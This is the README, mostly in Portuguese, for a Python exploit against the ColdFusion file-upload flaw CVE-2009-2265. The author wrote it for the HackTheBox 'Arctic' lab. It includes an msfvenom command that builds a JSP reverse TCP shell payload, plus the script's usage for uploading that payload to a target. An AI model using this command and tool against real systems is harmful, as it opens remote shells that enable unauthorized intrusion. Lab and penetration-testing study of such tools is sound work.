
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
exploit para coldfusion baseado em https://cvedetails.com/cve/CVE-2009-2265/
A principal razão pela qual criei um script python para este CVE específico foi que a versão do metasploit do mesmo não funcionou para mim quando tentei resolver a máquina HTB Arctic. Além disso, foi bom praticar um pouco de python. No entanto, existe outra versão python desse mesmo exploit por aí, criada originalmente por Alexander Reid, caso prefira usar a versão dele.
O uso é bastante simples:
Certifique-se de ter um arquivo de payload criado
ex. usando msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
uso: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
uso: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
-t TARGET ip do alvo
-p PORT porta do alvo
-f FILEPATH caminho do arquivo com shellcode para enviar
-b BASEPATH caminho base do coldfusion